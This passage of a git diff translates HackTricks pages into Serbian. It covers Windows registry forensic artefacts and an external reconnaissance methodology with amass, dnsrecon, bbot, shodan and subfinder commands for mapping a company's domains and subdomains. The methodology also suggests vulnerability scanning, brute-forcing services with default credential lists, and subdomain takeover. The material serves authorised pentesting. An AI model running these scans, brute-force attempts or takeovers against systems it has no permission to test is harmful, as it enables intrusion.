They are invaluable for investigations, revealing user activity that isn't obvious through other means. +- **Shellbags** ne samo da čuvaju podešavanja za prikaz foldera, već takođe pružaju forenzičke dokaze o pristupu folderima čak i ako folder više ne postoji. Oni su neprocenjivi za istrage, otkrivajući korisničke aktivnosti koje nisu očigledne na druge načine. ### USB Information and Forensics -- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents. +- Detalji pohranjeni u registry o USB uređajima mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa osetljivim prenosima datoteka ili incidentima neovlašćenog pristupa. ### Volume Serial Number -- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices. +- **Serijski broj volumena** može biti ključan za praćenje specifične instance datotečnog sistema, koristan u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke preko različitih uređaja. ### **Shutdown Details** -- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**. +- Vreme gašenja i broj gašenja (potonji samo za XP) se čuvaju u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**. ### **Network Configuration** -- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. 
+- Za detaljne informacije o mrežnim interfejsima, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. +- Prva i poslednja vremena mrežne veze, uključujući VPN veze, su zabeležena pod raznim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. ### **Shared Folders** -- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability. +- Deljeni folderi i podešavanja su pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Podešavanja Client Side Caching (CSC) određuju dostupnost offline datoteka. ### **Programs that Start Automatically** -- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup. +- Putanje poput **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe postavljene da se pokreću prilikom pokretanja. ### **Searches and Typed Paths** -- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively. +- Istraživanja u Explorer-u i unesene putanje se prate u registry pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, respektivno. ### **Recent Documents and Office Files** -- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths. +- Nedavne datoteke i Office datoteke koje su pristupane su zabeležene u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama verzije Office-a. 
### **Most Recently Used (MRU) Items** -- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`. +- MRU liste, koje ukazuju na nedavne putanje datoteka i komande, se čuvaju u raznim `ComDlg32` i `Explorer` podključevima pod `NTUSER.DAT`. ### **User Activity Tracking** -- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +- Funkcija User Assist beleži detaljne statistike korišćenja aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. ### **Shellbags Analysis** -- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis. +- Shellbags, koji otkrivaju detalje o pristupu folderima, se čuvaju u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu. ### **USB Device History** -- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps. -- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**. -- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively. 
+- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** i **`HKLM\SYSTEM\ControlSet001\Enum\USB`** sadrže bogate detalje o povezanim USB uređajima, uključujući proizvođača, naziv proizvoda i vremenske oznake povezivanja. +- Korisnik povezan sa specifičnim USB uređajem može se precizno odrediti pretraživanjem `NTUSER.DAT` hives za **{GUID}** uređaja. +- Poslednji montirani uređaj i njegov serijski broj volumena mogu se pratiti kroz `System\MountedDevices` i `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respektivno. This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md index ef4a9559e..d73f6fddd 100644 --- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md +++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md @@ -1,49 +1,41 @@ -# External Recon Methodology +# Metodologija spoljnog rekonaissansa {{#include ../../banners/hacktricks-training.md}} -
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +## Otkrića imovine -{% embed url="https://www.stmcyber.com/careers" %} +> Tako su vam rekli da je sve što pripada nekoj kompaniji unutar opsega, i želite da saznate šta ta kompanija zapravo poseduje. -## Assets discoveries +Cilj ove faze je da se dobiju sve **kompanije koje poseduje glavna kompanija** i zatim sve **imovine** tih kompanija. Da bismo to postigli, uradićemo sledeće: -> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns. +1. Pronaći akvizicije glavne kompanije, što će nam dati kompanije unutar opsega. +2. Pronaći ASN (ako postoji) svake kompanije, što će nam dati IP opsege koje poseduje svaka kompanija. +3. Koristiti obrnute whois pretrage da tražimo druge unose (imena organizacija, domene...) povezane sa prvim (ovo se može raditi rekurzivno). +4. Koristiti druge tehnike kao što su shodan `org` i `ssl` filteri da tražimo druge imovine (trik sa `ssl` se može raditi rekurzivno). -The goal of this phase is to obtain all the **companies owned by the main company** and then all the **assets** of these companies. To do so, we are going to: +### **Akvizicije** -1. Find the acquisitions of the main company, this will give us the companies inside the scope. -2. Find the ASN (if any) of each company, this will give us the IP ranges owned by each company -3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively) -4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively). 
+Prvo, treba da znamo koje **druge kompanije poseduje glavna kompanija**.\ +Jedna opcija je da posetite [https://www.crunchbase.com/](https://www.crunchbase.com), **pretražite** **glavnu kompaniju**, i **kliknite** na "**akvizicije**". Tamo ćete videti druge kompanije koje je glavna kompanija akvizirala.\ +Druga opcija je da posetite **Wikipedia** stranicu glavne kompanije i potražite **akvizicije**. -### **Acquisitions** +> U redu, u ovom trenutku trebali biste znati sve kompanije unutar opsega. Hajde da saznamo kako da pronađemo njihovu imovinu. -First of all, we need to know which **other companies are owned by the main company**.\ -One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\ -Other option is to visit the **Wikipedia** page of the main company and search for **acquisitions**. +### **ASNovi** -> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets. - -### **ASNs** - -An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\ -An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators. 
- -It's interesting to find if the **company have assigned any ASN** to find its **IP ranges.** It will be interested to perform a **vulnerability test** against all the **hosts** inside the **scope** and **look for domains** inside these IPs.\ -You can **search** by company **name**, by **IP** or by **domain** in [**https://bgp.he.net/**](https://bgp.he.net)**.**\ -**Depending on the region of the company this links could be useful to gather more data:** [**AFRINIC**](https://www.afrinic.net) **(Africa),** [**Arin**](https://www.arin.net/about/welcome/region/)**(North America),** [**APNIC**](https://www.apnic.net) **(Asia),** [**LACNIC**](https://www.lacnic.net) **(Latin America),** [**RIPE NCC**](https://www.ripe.net) **(Europe). Anyway, probably all the** useful information **(IP ranges and Whois)** appears already in the first link. +Broj autonomnog sistema (**ASN**) je **jedinstveni broj** dodeljen **autonomnom sistemu** (AS) od strane **Internet Assigned Numbers Authority (IANA)**.\ +**AS** se sastoji od **blokova** **IP adresa** koje imaju jasno definisanu politiku za pristup spoljnim mrežama i kojima upravlja jedna organizacija, ali se mogu sastojati od više operatera. +Zanimljivo je saznati da li je **kompanija dodelila neki ASN** da bi pronašla svoje **IP opsege.** Bilo bi zanimljivo izvršiti **test ranjivosti** protiv svih **hostova** unutar **opsega** i **tražiti domene** unutar ovih IP adresa.\ +Možete **pretraživati** po imenu kompanije, po **IP-u** ili po **domenu** na [**https://bgp.he.net/**](https://bgp.he.net)**.**\ +**U zavisnosti od regiona kompanije, ovi linkovi bi mogli biti korisni za prikupljanje dodatnih podataka:** [**AFRINIC**](https://www.afrinic.net) **(Afrika),** [**Arin**](https://www.arin.net/about/welcome/region/)**(Severna Amerika),** [**APNIC**](https://www.apnic.net) **(Azija),** [**LACNIC**](https://www.lacnic.net) **(Latinska Amerika),** [**RIPE NCC**](https://www.ripe.net) **(Evropa). 
U svakom slučaju, verovatno su sve** korisne informacije **(IP opsezi i Whois)** već prikazane u prvom linku. ```bash #You can try "automate" this with amass, but it's not very recommended amass intel -org tesla amass intel -asn 8911,50313,394161 ``` - -Also, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** subdomain enumeration automatically aggregates and summarizes ASNs at the end of the scan. - +Takođe, [**BBOT**](https://github.com/blacklanternsecurity/bbot)**'s** enumeracija poddomena automatski agregira i sumira ASN-ove na kraju skeniranja. ```bash bbot -t tesla.com -f subdomain-enum ... 
@@ -60,62 +52,59 @@ bbot -t tesla.com -f subdomain-enum [INFO] bbot.modules.asn: +----------+---------------------+--------------+----------------+----------------------------+-----------+ ``` +Možete pronaći IP opsege organizacije takođe koristeći [http://asnlookup.com/](http://asnlookup.com) (ima besplatan API).\ +Možete pronaći IP i ASN domena koristeći [http://ipv4info.com/](http://ipv4info.com). -You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\ -You can find the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com). +### **Traženje ranjivosti** -### **Looking for vulnerabilities** +U ovom trenutku znamo **sve resurse unutar opsega**, tako da, ako vam je dozvoljeno, možete pokrenuti neki **skener ranjivosti** (Nessus, OpenVAS) na svim hostovima.\ +Takođe, možete pokrenuti neke [**port skenove**](../pentesting-network/#discovering-hosts-from-the-outside) **ili koristiti usluge kao što je** shodan **da pronađete** otvorene portove **i u zavisnosti od onoga što pronađete, trebali biste** pogledati u ovu knjigu kako da pentestujete nekoliko mogućih usluga koje se izvode.\ +**Takođe, vredi napomenuti da možete pripremiti neke** liste podrazumevanih korisničkih imena **i** lozinki **i pokušati da** bruteforce-ujete usluge sa [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). 
-At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\ -Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\ -**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray). +## Domeni -## Domains +> Znamo sve kompanije unutar opsega i njihove resurse, vreme je da pronađemo domene unutar opsega. -> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope. +_Molimo vas, imajte na umu da u sledećim predloženim tehnikama možete takođe pronaći poddomene i da te informacije ne bi trebale biti potcenjene._ -_Please, note that in the following purposed techniques you can also find subdomains and that information shouldn't be underrated._ +Prvo, trebali biste potražiti **glavnu domenu**(e) svake kompanije. Na primer, za _Tesla Inc._ to će biti _tesla.com_. -First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_. - -### **Reverse DNS** - -As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8) +### **Obrnuti DNS** +Pošto ste pronašli sve IP opsege domena, mogli biste pokušati da izvršite **obrnute dns pretrage** na tim **IP-ovima kako biste pronašli više domena unutar opsega**. 
Pokušajte da koristite neki DNS server žrtve ili neki poznati DNS server (1.1.1.1, 8.8.8.8) ```bash dnsrecon -r -n #DNS reverse of all of the addresses dnsrecon -d facebook.com -r 157.240.221.35/24 #Using facebooks dns dnsrecon -r 157.240.221.35/24 -n 1.1.1.1 #Using cloudflares dns dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns ``` +Da bi ovo funkcionisalo, administrator mora ručno da omogući PTR.\ +Takođe možete koristiti online alat za ove informacije: [http://ptrarchive.com/](http://ptrarchive.com) -For this to work, the administrator has to enable manually the PTR.\ -You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com) +### **Obrnuti Whois (loop)** -### **Reverse Whois (loop)** +Unutar **whois** možete pronaći mnogo zanimljivih **informacija** kao što su **ime organizacije**, **adresa**, **emailovi**, brojevi telefona... Ali ono što je još zanimljivije je da možete pronaći **više sredstava povezanih sa kompanijom** ako izvršite **obrnute whois pretrage po bilo kojem od tih polja** (na primer, druge whois registre gde se isti email pojavljuje).\ +Možete koristiti online alate kao što su: -Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\ -You can use online tools like: +- [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Besplatno** +- [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Besplatno** +- [https://www.reversewhois.io/](https://www.reversewhois.io) - **Besplatno** +- [https://www.whoxy.com/](https://www.whoxy.com) - **Besplatno** web, nije besplatno API. 
+- [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Nije besplatno +- [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Nije besplatno (samo **100 besplatnih** pretraga) +- [https://www.domainiq.com/](https://www.domainiq.com) - Nije besplatno -- [https://viewdns.info/reversewhois/](https://viewdns.info/reversewhois/) - **Free** -- [https://domaineye.com/reverse-whois](https://domaineye.com/reverse-whois) - **Free** -- [https://www.reversewhois.io/](https://www.reversewhois.io) - **Free** -- [https://www.whoxy.com/](https://www.whoxy.com) - **Free** web, not free API. -- [http://reversewhois.domaintools.com/](http://reversewhois.domaintools.com) - Not free -- [https://drs.whoisxmlapi.com/reverse-whois-search](https://drs.whoisxmlapi.com/reverse-whois-search) - Not Free (only **100 free** searches) -- [https://www.domainiq.com/](https://www.domainiq.com) - Not Free +Možete automatizovati ovaj zadatak koristeći [**DomLink** ](https://github.com/vysecurity/DomLink)(zahteva whoxy API ključ).\ +Takođe možete izvršiti neku automatsku obrnutu whois otkrivanje sa [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` -You can automate this task using [**DomLink** ](https://github.com/vysecurity/DomLink)(requires a whoxy API key).\ -You can also perform some automatic reverse whois discovery with [amass](https://github.com/OWASP/Amass): `amass intel -d tesla.com -whois` - -**Note that you can use this technique to discover more domain names every time you find a new domain.** +**Imajte na umu da možete koristiti ovu tehniku da otkrijete više imena domena svaki put kada pronađete novi domen.** ### **Trackers** -If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\ -For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages. 
+Ako pronađete **isti ID istog trackera** na 2 različite stranice, možete pretpostaviti da su **obe stranice** **upravlja iste ekipe**.\ +Na primer, ako vidite isti **Google Analytics ID** ili isti **Adsense ID** na nekoliko stranica. -There are some pages and tools that let you search by these trackers and more: +Postoje neke stranice i alati koji vam omogućavaju da pretražujete po ovim trackerima i još: - [**Udon**](https://github.com/dhn/udon) - [**BuiltWith**](https://builtwith.com) 
@@ -125,113 +114,99 @@ There are some pages and tools that let you search by these trackers and more: ### **Favicon** -Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it: - +Da li ste znali da možemo pronaći povezane domene i poddomene našeg cilja tražeći isti hash favicon ikone? Ovo je upravo ono što alat [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) koji je napravio [@m4ll0k2](https://twitter.com/m4ll0k2) radi. Evo kako ga koristiti: ```bash cat my_targets.txt | xargs -I %% bash -c 'echo "http://%%/favicon.ico"' > targets.txt python3 favihash.py -f https://target/favicon.ico -t targets.txt -s ``` +![favihash - otkrijte domene sa istim favicon ikonom hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) -![favihash - discover domains with the same favicon icon hash](https://www.infosecmatter.com/wp-content/uploads/2020/07/favihash.jpg) - -Simply said, favihash will allow us to discover domains that have the same favicon icon hash as our target. - -Moreover, you can also search technologies using the favicon hash as explained in [**this blog post**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). That means that if you know the **hash of the favicon of a vulnerable version of a web tech** you can search if in shodan and **find more vulnerable places**: +Jednostavno rečeno, favihash će nam omogućiti da otkrijemo domene koje imaju isti favicon ikonu hash kao naš cilj. +Štaviše, možete takođe pretraživati tehnologije koristeći favicon hash kao što je objašnjeno u [**ovom blog postu**](https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139). 
To znači da ako znate **hash favicon-a ranjive verzije web tehnologije** možete pretraživati u shodan-u i **pronaći više ranjivih mesta**: ```bash shodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}' ``` - -This is how you can **calculate the favicon hash** of a web: - +Ovako možete **izračunati favicon hash** veba: ```python import mmh3 import requests import codecs def fav_hash(url): - response = requests.get(url) - favicon = codecs.encode(response.content,"base64") - fhash = mmh3.hash(favicon) - print(f"{url} : {fhash}") - return fhash +response = requests.get(url) +favicon = codecs.encode(response.content,"base64") +fhash = mmh3.hash(favicon) +print(f"{url} : {fhash}") +return fhash ``` - ### **Copyright / Uniq string** -Search inside the web pages **strings that could be shared across different webs in the same organisation**. The **copyright string** could be a good example. Then search for that string in **google**, in other **browsers** or even in **shodan**: `shodan search http.html:"Copyright string"` +Pretražujte unutar web stranica **nizove koji se mogu deliti između različitih webova u istoj organizaciji**. **Copyright string** može biti dobar primer. Zatim pretražujte taj niz u **google-u**, u drugim **pregledačima** ili čak u **shodan-u**: `shodan search http.html:"Copyright string"` ### **CRT Time** -It's common to have a cron job such as - +Uobičajeno je imati cron job kao ```bash # /etc/crontab 37 13 */10 * * certbot renew --post-hook "systemctl reload nginx" ``` +da obnovite sve sertifikate domena na serveru. To znači da čak i ako CA koja se koristi za ovo ne postavi vreme kada je generisan u vremenu važenja, moguće je **pronaći domene koje pripadaju istoj kompaniji u logovima transparentnosti sertifikata**.\ +Pogledajte ovaj [**izveštaj za više informacija**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/). 
-to renew the all the domain certificates on the server. This means that even if the CA used for this doesn't set the time it was generated in the Validity time, it's possible to **find domains belonging to the same company in the certificate transparency logs**.\ -Check out this [**writeup for more information**](https://swarm.ptsecurity.com/discovering-domains-via-a-time-correlation-attack/). +### Mail DMARC informacije -### Mail DMARC information +Možete koristiti veb sajt kao što je [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) ili alat kao što je [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) da pronađete **domene i poddomene koje dele iste DMARC informacije**. -You can use a web such as [https://dmarc.live/info/google.com](https://dmarc.live/info/google.com) or a tool such as [https://github.com/Tedixx/dmarc-subdomains](https://github.com/Tedixx/dmarc-subdomains) to find **domains and subdomain sharing the same dmarc information**. +### **Pasivno preuzimanje** -### **Passive Takeover** +Očigledno je uobičajeno da ljudi dodeljuju poddomene IP-ovima koji pripadaju provajderima u oblaku i u nekom trenutku **izgube tu IP adresu, ali zaborave da uklone DNS zapis**. Stoga, samo **pokretanjem VM-a** u oblaku (kao što je Digital Ocean) zapravo ćete **preuzeti neke poddomene**. -Apparently is common for people to assign subdomains to IPs that belongs to cloud providers and at some point **lose that IP address but forget about removing the DNS record**. Therefore, just **spawning a VM** in a cloud (like Digital Ocean) you will be actually **taking over some subdomains(s)**. +[**Ova objava**](https://kmsec.uk/blog/passive-takeover/) objašnjava priču o tome i predlaže skriptu koja **pokreće VM u DigitalOcean-u**, **dobija** **IPv4** nove mašine i **pretražuje u Virustotal-u za zapise poddomena** koji upućuju na nju. 
-[**This post**](https://kmsec.uk/blog/passive-takeover/) explains a store about it and propose a script that **spawns a VM in DigitalOcean**, **gets** the **IPv4** of the new machine, and **searches in Virustotal for subdomain records** pointing to it. +### **Ostali načini** -### **Other ways** - -**Note that you can use this technique to discover more domain names every time you find a new domain.** +**Napomena da možete koristiti ovu tehniku da otkrijete više imena domena svaki put kada pronađete novu domenu.** **Shodan** -As you already know the name of the organisation owning the IP space. You can search by that data in shodan using: `org:"Tesla, Inc."` Check the found hosts for new unexpected domains in the TLS certificate. +Kao što već znate ime organizacije koja poseduje IP prostor. Možete pretraživati po tim podacima u Shodanu koristeći: `org:"Tesla, Inc."` Proverite pronađene hostove za nove neočekivane domene u TLS sertifikatu. -You could access the **TLS certificate** of the main web page, obtain the **Organisation name** and then search for that name inside the **TLS certificates** of all the web pages known by **shodan** with the filter : `ssl:"Tesla Motors"` or use a tool like [**sslsearch**](https://github.com/HarshVaragiya/sslsearch). +Možete pristupiti **TLS sertifikatu** glavne veb stranice, dobiti **ime organizacije** i zatim pretraživati to ime unutar **TLS sertifikata** svih veb stranica poznatih u **Shodanu** sa filtrima: `ssl:"Tesla Motors"` ili koristiti alat kao što je [**sslsearch**](https://github.com/HarshVaragiya/sslsearch). **Assetfinder** -[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing. +[**Assetfinder**](https://github.com/tomnomnom/assetfinder) je alat koji traži **domene povezane** sa glavnom domenom i **poddomenama** njih, prilično neverovatno. 
-### **Looking for vulnerabilities** +### **Traženje ranjivosti** -Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company. +Proverite za neki [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Možda neka kompanija **koristi neku domenu** ali su **izgubili vlasništvo**. Samo je registrujte (ako je dovoljno jeftina) i obavestite kompaniju. -If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\ -&#xNAN;_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._ +Ako pronađete neku **domenu sa IP-om koji se razlikuje** od onih koje ste već pronašli u otkrivanju sredstava, trebali biste izvršiti **osnovno skeniranje ranjivosti** (koristeći Nessus ili OpenVAS) i neko [**skeniranje portova**](../pentesting-network/#discovering-hosts-from-the-outside) sa **nmap/masscan/shodan**. U zavisnosti od toga koji servisi rade, možete pronaći u **ovoj knjizi neke trikove za "napad" na njih**.\ +&#xNAN;_Note da ponekad je domena hostovana unutar IP-a koji nije pod kontrolom klijenta, tako da nije u opsegu, budite oprezni._ -\ -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! 
-{% embed url="https://go.intigriti.com/hacktricks" %} -## Subdomains +## Poddomene -> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies. +> Znamo sve kompanije unutar opsega, sve resurse svake kompanije i sve domene povezane sa kompanijama. -It's time to find all the possible subdomains of each found domain. +Vreme je da pronađemo sve moguće poddomene svake pronađene domene. > [!TIP] -> Note that some of the tools and techniques to find domains can also help to find subdomains +> Napomena da neki od alata i tehnika za pronalaženje domena mogu takođe pomoći u pronalaženju poddomena ### **DNS** -Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it). - +Pokušajmo da dobijemo **poddomene** iz **DNS** zapisa. Takođe bismo trebali pokušati za **Zone Transfer** (Ako je ranjiv, trebali biste to prijaviti). ```bash dnsrecon -a -d tesla.com ``` - ### **OSINT** -The fastest way to obtain a lot of subdomains is search in external sources. The most used **tools** are the following ones (for better results configure the API keys): +Najbrži način da se dobiju mnogi poddomeni je pretraga u spoljnim izvorima. Najčešće korišćeni **alati** su sledeći (za bolje rezultate konfigurišite API ključeve): - [**BBOT**](https://github.com/blacklanternsecurity/bbot) - ```bash # subdomains bbot -t tesla.com -f subdomain-enum 
@@ -242,108 +217,80 @@ bbot -t tesla.com -f subdomain-enum -rf passive # subdomains + port scan + web screenshots bbot -t tesla.com -f subdomain-enum -m naabu gowitness -n my_scan -o . ``` - - [**Amass**](https://github.com/OWASP/Amass) - ```bash amass enum [-active] [-ip] -d tesla.com amass enum -d tesla.com | grep tesla.com # To just list subdomains ``` - - [**subfinder**](https://github.com/projectdiscovery/subfinder) - ```bash # Subfinder, use -silent to only have subdomains in the output ./subfinder-linux-amd64 -d tesla.com [-silent] ``` - - [**findomain**](https://github.com/Edu4rdSHL/findomain/) - ```bash # findomain, use -silent to only have subdomains in the output ./findomain-linux -t tesla.com [--quiet] ``` - - [**OneForAll**](https://github.com/shmilylty/OneForAll/tree/master/docs/en-us) - ```bash python3 oneforall.py --target tesla.com [--dns False] [--req False] [--brute False] run ``` - - [**assetfinder**](https://github.com/tomnomnom/assetfinder) - ```bash assetfinder --subs-only ``` - - [**Sudomy**](https://github.com/Screetsec/Sudomy) - ```bash # It requires that you create a sudomy.api file with API keys sudomy -d tesla.com ``` - - [**vita**](https://github.com/junnlikestea/vita) - ``` vita -d tesla.com ``` - - [**theHarvester**](https://github.com/laramies/theHarvester) - ```bash theHarvester -d tesla.com -b "anubis, baidu, bing, binaryedge, bingapi, bufferoverun, censys, certspotter, crtsh, dnsdumpster, duckduckgo, fullhunt, github-code, google, hackertarget, hunter, intelx, linkedin, linkedin_links, n45ht, omnisint, otx, pentesttools, projectdiscovery, qwant, rapiddns, rocketreach, securityTrails, spyse, sublist3r, threatcrowd, threatminer, trello, twitter, urlscan, virustotal, yahoo, zoomeye" ``` +Postoje **drugi zanimljivi alati/API** koji, iako nisu direktno specijalizovani za pronalaženje poddomena, mogu biti korisni za pronalaženje poddomena, kao što su: -There are **other interesting tools/APIs** that even if not directly specialised in 
finding subdomains could be useful to find subdomains, like: - -- [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Uses the API [https://sonar.omnisint.io](https://sonar.omnisint.io) to obtain subdomains - +- [**Crobat**](https://github.com/cgboal/sonarsearch)**:** Koristi API [https://sonar.omnisint.io](https://sonar.omnisint.io) za dobijanje poddomena ```bash # Get list of subdomains in output from the API ## This is the API the crobat tool will use curl https://sonar.omnisint.io/subdomains/tesla.com | jq -r ".[]" ``` - -- [**JLDC free API**](https://jldc.me/anubis/subdomains/google.com) - +- [**JLDC besplatan API**](https://jldc.me/anubis/subdomains/google.com) ```bash curl https://jldc.me/anubis/subdomains/tesla.com | jq -r ".[]" ``` - -- [**RapidDNS**](https://rapiddns.io) free API - +- [**RapidDNS**](https://rapiddns.io) besplatni API ```bash # Get Domains from rapiddns free API rapiddns(){ - curl -s "https://rapiddns.io/subdomain/$1?full=1" \ - | grep -oE "[\.a-zA-Z0-9-]+\.$1" \ - | sort -u +curl -s "https://rapiddns.io/subdomain/$1?full=1" \ +| grep -oE "[\.a-zA-Z0-9-]+\.$1" \ +| sort -u } rapiddns tesla.com ``` - - [**https://crt.sh/**](https://crt.sh) - ```bash # Get Domains from crt free API crt(){ - curl -s "https://crt.sh/?q=%25.$1" \ - | grep -oE "[\.a-zA-Z0-9-]+\.$1" \ - | sort -u +curl -s "https://crt.sh/?q=%25.$1" \ +| grep -oE "[\.a-zA-Z0-9-]+\.$1" \ +| sort -u } crt tesla.com ``` - -- [**gau**](https://github.com/lc/gau)**:** fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain. - +- [**gau**](https://github.com/lc/gau)**:** 